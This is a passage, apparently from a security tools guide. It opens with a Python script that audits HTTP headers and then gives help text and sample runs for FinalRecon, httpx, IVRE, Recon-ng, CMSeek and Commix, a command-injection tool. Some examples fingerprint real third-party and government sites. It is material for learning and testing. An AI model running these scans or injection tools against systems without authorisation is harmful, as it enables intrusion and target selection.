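# Constructed sample modelled on the witnessme grab output above (headers trimmed).
SAMPLE_GRAB = {
    "scheme": "http",
    "url": "http://192.168.11.4:80",
    "headers": {
        "content-type": "text/html; charset=UTF-8",
        "server": "Apache/2.4.62 (Debian)",
        # witnessme joins multiple Set-Cookie headers with a newline
        "set-cookie": "maintenance_token=deleted; expires=Sat, 02 Dec 2023 07:03:31 GMT; Max-Age=0; path=/; httponly\n"
                      "eccube=khjfkis6uuhmvr3dbv0j83tb2a; path=/; httponly",
        "x-content-type-options": "nosniff",
        "x-debug-token": "5ace25",
        "x-debug-token-link": "http://192.168.11.4/_profiler/5ace25",
        "x-frame-options": "SAMEORIGIN",
        "x-powered-by": "PHP/8.1.31",
        "x-xss-protection": "1; mode=block",
    },
}


def audit_headers(headers: Dict[str, str], scheme: str = "https") -> List[Finding]:
    """Review a response header map for hardening gaps and disclosures."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[Finding] = []

    # 1. Hardening headers expected on an HTML response.
    csp = h.get("content-security-policy", "")
    if not csp:
        findings.append(("MISSING", "content-security-policy", "no CSP; injected script is unconstrained"))
    if "x-frame-options" not in h and "frame-ancestors" not in csp:
        findings.append(("MISSING", "x-frame-options", "no framing restriction (clickjacking)"))
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append(("MISSING", "x-content-type-options", "MIME sniffing not disabled"))
    if "referrer-policy" not in h:
        findings.append(("MISSING", "referrer-policy", "referrer leakage not restricted"))
    if scheme == "https":
        if "strict-transport-security" not in h:
            findings.append(("MISSING", "strict-transport-security", "HSTS not set"))
    else:
        findings.append(("TRANSPORT", "url", "served over plaintext HTTP; cookies and content exposed in transit"))

    # 2. Version disclosure in server banners.
    for name in ("server", "x-powered-by"):
        if name in h and re.search(r"\d+\.\d+", h[name]):
            findings.append(("DISCLOSURE", name, f"version string exposed: {h[name]}"))

    # 3. Framework debug/profiler headers that should not reach production.
    for name in ("x-debug-token", "x-debug-token-link"):
        if name in h:
            findings.append(("DEBUG", name, "debug/profiler header present; verify debug mode is off"))

    # 4. Deprecated: the browser XSS auditor was removed; "0" is the recommended value today.
    if h.get("x-xss-protection", "").strip().startswith("1"):
        findings.append(("DEPRECATED", "x-xss-protection", "relies on removed browser XSS auditor; use CSP and set to 0"))

    # 5. Cookie attributes, one Set-Cookie per line.
    for cookie in filter(None, (c.strip() for c in h.get("set-cookie", "").split("\n"))):
        name = cookie.split("=", 1)[0].strip()
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if "httponly" not in attrs:
            findings.append(("COOKIE", name, "HttpOnly missing"))
        if "secure" not in attrs:
            findings.append(("COOKIE", name, "Secure missing"))
        if not any(a.startswith("samesite") for a in attrs):
            findings.append(("COOKIE", name, "SameSite missing"))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per category, handy for comparing scans over time."""
    return dict(Counter(cat for cat, _, _ in findings))


if __name__ == "__main__":
    for cat, name, why in audit_headers(SAMPLE_GRAB["headers"], SAMPLE_GRAB["scheme"]):
        print(f"[{cat:<10}] {name}: {why}")
```

The checks are deliberately conservative: a missing header is only reported when no equivalent (such as a CSP frame-ancestors directive) covers the same risk, and Secure is still flagged on a plain-HTTP site because the finding that matters there is the transport itself.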
Multi-purpose Toolkit
FinalRecon
Provides comprehensive functionality against a target website: retrieving header information, WHOIS information, SSL certificate information, and DNS information, subdomain discovery, directory discovery, port scanning, and more.
■ Usage
root@kali:~# finalrecon --help
usage: finalrecon [-h] [--url URL] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--dir] [--wayback] [--ps] [--full] [-nb]
[-dt DT] [-pt PT] [-T T] [-w W] [-r] [-s] [-sp SP] [-d D] [-e E] [-o O] [-cd CD] [-k K]
options:
-h, --help show this help message and exit
--url URL Target URL
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--dir Directory Search
--wayback Wayback URLs
--ps Fast Port Scan
--full Full Recon
Extra Options:
-nb Hide Banner
-dt DT Number of threads for directory enum [ Default : 30 ]
-pt PT Number of threads for port scan [ Default : 50 ]
-T T Request Timeout [ Default : 30.0 ]
-w W Path to Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-sp SP Specify SSL Port [ Default : 443 ]
-d D Custom DNS Servers [ Default : 1.1.1.1 ]
-e E File Extensions [ Example : txt, xml, php ]
-o O Export Format [ Default : txt ]
-cd CD Change export directory [ Default : ~/.local/share/finalrecon ]
-k K Add API key [ Example : shodan@key ]
■ Usage examples
root@kali:~# finalrecon --headers --url https://x.com
[...]
[!] Headers :
date : Sat, 05 Oct 2024 03:11:41 GMT
perf : 7402827104
expiry : Tue, 31 Mar 1981 05:00:00 GMT
pragma : no-cache
server : tsa_m
set-cookie : guest_id_marketing=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, guest_id_ads=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, personalization_id="v1_mWycO5XfwlN/98rX98j7OA=="; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, guest_id=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, ct0=; Max-Age=-1728097900; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.x.com; Secure; SameSite=Lax
content-type : text/html; charset=utf-8
x-powered-by : Express
cache-control : no-store, max-age=0
last-modified : Sat, 05 Oct 2024 03:11:41 GMT
x-frame-options : DENY
x-transaction-id : 2e77ad93f7dd92be
x-xss-protection : 0
x-content-type-options : nosniff
content-security-policy : connect-src 'self' blob: https://*.pscp.tv https://*.twimg.com https://*.video.pscp.tv https://aa.twitter.com https://aa.x.com https://accounts.google.com/gsi/ https://ads-api.twitter.com https://ads-api.x.com https://api-stream.twitter.com https://api-stream.x.com https://api.twitter.com https://api.x.ai https://api.x.com https://api.x.com https://caps.twitter.com https://caps.x.com https://jf.twitter.com https://jf.x.com https://pay.twitter.com https://pay.x.com https://production.plaid.com/ https://sandbox.plaid.com/ https://sentry.io https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://ton.twitter.com https://ton.x.com https://twitter.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://x.com https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com ws://localhost:8008/v2/ipc http://127.0.0.1:7346 http://127.0.0.1:9001 http://localhost:9013 https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://accounts.google.com/ https://accounts.google.com/gsi/ https://api.sandbox.sardine.ai/ https://cards-frame.twitter.com https://cdn.plaid.com/ https://client-api.arkoselabs.com/ https://content.googleapis.com/ https://iframe.arkoselabs.com/ https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://payments-dev.x.com/ https://payments-staging.x.com/ https://payments-prod.x.com/ https://twitter.com https://vaultjs.apideck.com/ https://verify-sandbox.plaid.com/ https://x.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ http://www.gstatic.com/cast/sdk/libs/caf_receiver/v3/cast_receiver_framework.js https://accounts.google.com/gsi/client https://api.sandbox.sardine.ai/assets/loader.min.js https://apis.google.com/js/api.js https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js https://cdn.plaid.com/link/v2/stable/link-initialize.js https://client-api.arkoselabs.com/ https://static.ads-twitter.com https://twitter.com https://www.google-analytics.com https://www.gstatic.com/cast/sdk/libs/caf_receiver/v3/cast_receiver_framework.js https://x.com http://localhost:12345/scfs/cl/js/vizio-companion-lib.js 'wasm-unsafe-eval' 'nonce-MjhlMDRlMGEtNjU3Zi00YWU3LTk5ZTQtZmZkN2RhMTkwNDM3'; style-src 'self' 'unsafe-inline' https://accounts.google.com/gsi/style https://*.twimg.com; worker-src 'self' blob:; report-uri https://x.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
strict-transport-security : max-age=631138519
cross-origin-opener-policy : unsafe-none
cross-origin-embedder-policy : unsafe-none
content-encoding : gzip
x-response-time : 105
x-connection-hash : 1ea410203591d1d495464746b92645b073bb6f149eb19f05b6c4bccbaf4f1ea2
transfer-encoding : chunked
root@kali:~# finalrecon --dns --url https://x.com
[...]
[!] Starting DNS Enumeration...
A : 104.244.42.193
A : 104.244.42.1
A : 104.244.42.129
A : 104.244.42.65
MX : 5 alt1.aspmx.l.google.com.
MX : 5 alt2.aspmx.l.google.com.
MX : 10 alt3.aspmx.l.google.com.
MX : 1 aspmx.l.google.com.
MX : 10 alt4.aspmx.l.google.com.
NS : d.u10.twtrdns.net.
NS : b.r10.twtrdns.net.
NS : b.u10.twtrdns.net.
NS : a.r10.twtrdns.net.
NS : c.u10.twtrdns.net.
NS : d.r10.twtrdns.net.
NS : a.u10.twtrdns.net.
NS : c.r10.twtrdns.net.
SOA : a.u10.twtrdns.net. noc.twitter.com. 2023138457 3600 600 604800 300
TXT : "kkdl3qb3tcrmdhfsm803p67r0my0svs8"
TXT : "slack-domain-verification=Csk4bjCPFnJaDLLaKFUwCTFuUpCVvnYlAm2Tba0i"
TXT : "atlassian-sending-domain-verification=bd424180-8645-4de5-bd6a-285479c7577a"
TXT : "google-site-verification=F6u9mGL--d2lbLljvH3b1UUgXtevQPdcamKr9c8914A"
TXT : "_w548xs1kfxtlqk3jyx19bzwk34c473i"
TXT : "adobe-idp-site-verification=ab4d9ce3473a73e81f46238da34ea4967fd5ac80e5c43fbfa8dff46d06a5321c"
TXT : "atlassian-domain-verification=j6u0o1PTkobCXC84uEF/sWpIPtaZURBVYqKzmTvT8wugLcHT1vvrzzA63iP1qSLN"
TXT : "google-site-verification=8yQmoVhQedzlt36RPeQP41ytrEFk9aHEnde_xm0626g"
TXT : "3089463"
TXT : "adobe-sign-verification=c693a744ee2d282a36a43e6e724c5ea"
TXT : "apple-domain-verification=sEij6tJOW11fVNrG"
TXT : "v=spf1 ip4:199.16.156.128/26 ip4:199.59.150.64/26 include:_spf.google.com include:_spf.salesforce.com include:_oerp.x.com -all"
DMARC : "v=DMARC1; p=reject; rua=mailto:caf935f12c8645b2921b0749d1fcd49e@dmarc-reports.cloudflare.net"
httpx
A multi-purpose HTTP toolkit that can run several kinds of probes against web hosts.
■ Usage
root@kali:~# httpx --help
Usage:
httpx [flags]
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-extract-fqdn, -efqdn get domain and subdomains from response body and header in jsonl/csv output
-asn display host asn information
-cdn display cdn/waf in use (default true)
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-ho, -headless-options string[] start headless chrome with additional options
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless header from json output
-st, -screenshot-timeout int set timeout for screenshot in seconds (default 10)
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string[] match response with specified string (-ms admin)
-mr, -match-regex string[] match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (mail,url,ipv4)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string[] filter response with specified string (-fs admin)
-fe, -filter-regex string[] filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-ob, -omit-body omit response body in output
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
-pr, -protocol string protocol to use (unknown, http11)
-fepp, -filter-error-page-path string path to store filtered error pages (default "filtered_error_page.json")
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR's to process (file or comma separated)
-deny string[] denied list of IP/CIDR's to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
-hae, -http-api-endpoint string experimental http api endpoint
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-e, -exclude string[] exclude host matching specified filter ('cdn', 'private-ips', cidr, ip, regex)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-pd, -dashboard upload / view output in projectdiscovery cloud (pdcp) UI dashboard
-aid, -asset-id string upload new assets to existing asset id (optional)
-aname, -asset-name string assets group name to set (optional)
-pdu, -dashboard-upload string upload httpx output file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard
■ Usage examples
# Identify the technology stack in use, based on the wappalyzer dataset
root@kali:~# httpx -u qiita.com -tech-detect
https://qiita.com [Amazon CloudFront,Amazon Web Services,DoubleClick for Publishers (DFP),Google Publisher Tag,HSTS,Nginx,Ruby,Ruby on Rails]
# From a list of domains, extract the sites whose technology stack includes PHP
root@kali:~# cat gov-domains.txt | httpx -silent -json | jq -c 'select(.tech[] | contains("PHP")) | {url: .url, tech: .tech}' | anew
{"url":"https://carbon-markets.go.jp","tech":["Apache HTTP Server:2.4.6","Bootstrap","CentOS","OpenSSL:1.0.2k","PHP:7.2.34"]}
{"url":"https://cals-ed.go.jp","tech":["Apache HTTP Server","MySQL","PHP","WordPress"]}
{"url":"https://cio.go.jp","tech":["Amazon CloudFront","Amazon S3","Amazon Web Services","Bootstrap:3.2.0","Cloudflare","Drupal","FlexSlider","Google Hosted Libraries","Material Design Lite","Modernizr","PHP","cdnjs","jQuery"]}
{"url":"https://chizai-kinyu.go.jp","tech":["Google Analytics","Google Tag Manager","MySQL","Nginx","PHP","WordPress","jQuery"]}
{"url":"https://amami.go.jp","tech":["Apache HTTP Server","MySQL","PHP:8.1.29","WordPress"]}
[...]
# From a list of domains, take screenshots of the sites that serve an existing page
root@kali:~# cat domains.txt | httpx -silent -mc 200,301,302 -ss
https://google.co.jp
https://yahoo.co.jp
IVRE
A network reconnaissance framework. It can run a passive DNS service, serve as the basis for building your own EASM tool, and collect and analyze network intelligence.
■ Usage
root@kali:~# ivre help
usage: ivre [COMMAND]
available commands:
airodump2db
arp2db
auditdom
db2view
flow2db
flowcli
getmoduli
getwebdata
httpd
ipcalc
ipdata
iphost
ipinfo
localscan
macdata
macinfo
p0f2db
passiverecon2db
passivereconworker
plotdb
runscans
runscansagent
runscansagentdb
scan2db
scancli
scanstatus
sort
version
view
weblog2db
zeek2db
Try ivre help [COMMAND]
■ Usage example
# Run a service scan against the target
root@kali:~# ivre runscans --categories TEST_SCAN --range 192.168.11.4 192.168.11.4 --output XMLFork
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 03:23 UTC
[...]
Discovered open port 21/tcp on 192.168.11.4
Discovered open port 25/tcp on 192.168.11.4
Discovered open port 5900/tcp on 192.168.11.4
Discovered open port 445/tcp on 192.168.11.4
Discovered open port 139/tcp on 192.168.11.4
Discovered open port 22/tcp on 192.168.11.4
Discovered open port 80/tcp on 192.168.11.4
Discovered open port 3306/tcp on 192.168.11.4
Discovered open port 23/tcp on 192.168.11.4
Discovered open port 111/tcp on 192.168.11.4
Discovered open port 8009/tcp on 192.168.11.4
Discovered open port 513/tcp on 192.168.11.4
Discovered open port 1099/tcp on 192.168.11.4
Discovered open port 2121/tcp on 192.168.11.4
Discovered open port 5432/tcp on 192.168.11.4
Discovered open port 8180/tcp on 192.168.11.4
Discovered open port 6667/tcp on 192.168.11.4
Discovered open port 514/tcp on 192.168.11.4
Discovered open port 512/tcp on 192.168.11.4
Discovered open port 1524/tcp on 192.168.11.4
Discovered open port 6000/tcp on 192.168.11.4
Completed SYN Stealth Scan at 03:23, 0.08s elapsed (1000 total ports)
Initiating Service scan at 03:23
Scanning 21 services on server4test.mynet (192.168.11.4)
[...]
# Import the scan results into the DB
root@kali:~# ivre scan2db --categories TEST_SCAN-001 --source MySource --recursive scans/TEST_SCAN/up/
# Build a view from the nmap scan results imported into the DB
root@kali:~# ivre db2view nmap
# Start the built-in web server
root@kali:~# ivre httpd
Check the scan results from a browser.
Recon-ng
A reconnaissance framework that provides a wide range of features for information gathering.
■ Usage
root@kali:~# recon-ng --help
usage: recon-ng [-h] [-w workspace] [-r filename] [--no-version] [--no-analytics] [--no-marketplace] [--stealth] [--accessible] [--version]
recon-ng - Tim Tomes (@lanmaster53)
options:
-h, --help show this help message and exit
-w workspace load/create a workspace
-r filename load commands from a resource file
--no-version disable version check. Already disabled by default in Debian
--no-analytics disable analytics reporting. Already disabled by default in Debian
--no-marketplace disable remote module management
--stealth disable all passive requests (--no-*)
--accessible Use accessible outputs when available
--version displays the current version
■ Usage example
root@kali:~# recon-ng
[...]
[*] No modules enabled/installed.
# List the installable modules
[recon-ng][default] > marketplace info all
+------------------------------------------------------------------------------------+
| path | discovery/info_disclosure/cache_snoop |
| name | DNS Cache Snooper |
| author | thrapt (thrapt@gmail.com) |
| version | 1.1 |
| last_updated | 2020-10-13 |
| description | Uses the DNS cache snooping technique to check for visited domains |
| required_keys | [] |
| dependencies | [] |
| files | ['av_domains.lst'] |
| status | not installed |
+------------------------------------------------------------------------------------+
[...]
# Install a module
[recon-ng][default] > marketplace install recon/domains-hosts/google_site_web
[*] Module installed: recon/domains-hosts/google_site_web
[*] Reloading modules...
# Load the installed module
[recon-ng][default] > modules load recon/domains-hosts/google_site_web
# Show the module's options
[recon-ng][default][google_site_web] > options
Manages the current context options
Usage: options <list|set|unset> [...]
[recon-ng][default][google_site_web] > options list
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'info' for details)
# Set an option
[recon-ng][default][google_site_web] > options set SOURCE qiita.com
SOURCE => qiita.com
# Run the module
[recon-ng][default][google_site_web] > run
---------
QIITA.COM
---------
[*] Searching Google for: site:qiita.com
[*] Country: None
[*] Host: zine.qiita.com
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: corp.qiita.com
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[...]
-------
SUMMARY
-------
[*] 7 total (7 new) hosts found.
# Query the results
[recon-ng][default][google_site_web] > db query select * from hosts where module = 'google_site_web'
+----------------------------------------------------------------------------------------------------+
| host | ip_address | region | country | latitude | longitude | notes | module |
+----------------------------------------------------------------------------------------------------+
| zine.qiita.com | | | | | | | google_site_web |
| corp.qiita.com | | | | | | | google_site_web |
| blog.qiita.com | | | | | | | google_site_web |
| teams.qiita.com | | | | | | | google_site_web |
| help.qiita.com | | | | | | | google_site_web |
| dalab.qiita.com | | | | | | | google_site_web |
| grooves.qiita.com | | | | | | | google_site_web |
+----------------------------------------------------------------------------------------------------+
[*] 7 rows returned
Exploitation and Vulnerability Analysis Tools
Vulnerability Scanning and Exploit
CMSeek
Identifies which CMS a site is running.
■ Usage
root@kali:~# cmseek --help
USAGE:
python3 cmseek.py (for guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>
SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, --list LIST Path of the file containing list of sites
for multi-site scan (comma separated)
MANIPULATING SCAN:
-i cms, --ignore--cms cms Specify which CMS IDs to skip in order to
avoid flase positive. separated by comma ","
--strict-cms cms Checks target against a list of provided
CMS IDs. separated by comma ","
--skip-scanned Skips target if it's CMS was previously detected.
--light-scan Skips Deep Scan. Does CMS and version detection only.
-o, --only-cms Only detect CMS, ignore deep scan and version detection.
RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)
USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent
OUTPUT:
-v, --verbose Increase output verbosity
VERSION:
--version Show CMSeeK version and exit
HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result
--batch Never ask you to press enter after every site in a list is scanned
■ Usage example
root@kali:~# cmseek -u http://192.168.11.4/
┏━Target: 192.168.11.4
┃
┠── CMS: EC-CUBE
┃ │
┃ ╰── URL: https://www.ec-cube.net/
┃
┠── Result: /usr/share/cmseek/Result/192.168.11.4/cms.json
┃
┗━Scan Completed in 2.57 Seconds, using 1 Requests
Commix
Runs a variety of OS command injection payloads against a web application.
■ Usage
root@kali:~# commix --help
Usage: commix [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--version Show version number and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--skip-heuristics Skip heuristic detection for code injection.
--codec=CODEC Force codec for character encoding (e.g. 'ascii').
--charset=CHARSET Time-related injection charset (e.g.
"0123456789abcdef")
--check-internet Check internet connection before assessing the target.
--answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
Target:
This options has to be provided, to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL
(Default: 1).
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout").
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.
--method=METHOD Force usage of given HTTP method (e.g. PUT)
Request:
These options can be used to specify how to connect to the target URL.
-d DATA, --data=.. Data string to be sent through POST.
--host=HOST HTTP Host header.
--referer=REFERER HTTP Referer header.
--user-agent=AGENT HTTP User-Agent header.
--random-agent Use a randomly selected HTTP User-Agent header.
--param-del=PDEL Set character for splitting parameter values.
--cookie=COOKIE HTTP Cookie header.
--cookie-del=CDEL Set character for splitting cookie values.
-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
--proxy=PROXY Use a proxy to connect to the target URL.
--tor Use the Tor network.
--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).
--tor-check Check to see if Tor is used properly.
--auth-url=AUTH_.. Login panel URL.
--auth-data=AUTH.. Login parameters and data.
--auth-type=AUTH.. HTTP authentication type (Basic, Digest, Bearer).
--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').
--ignore-code=IG.. Ignore (problematic) HTTP error code (e.g. 401).
--force-ssl Force usage of SSL/HTTPS.
--ignore-proxy Ignore system default proxy settings.
--ignore-redirects Ignore redirection attempts.
--timeout=TIMEOUT Seconds to wait before timeout connection (Default:
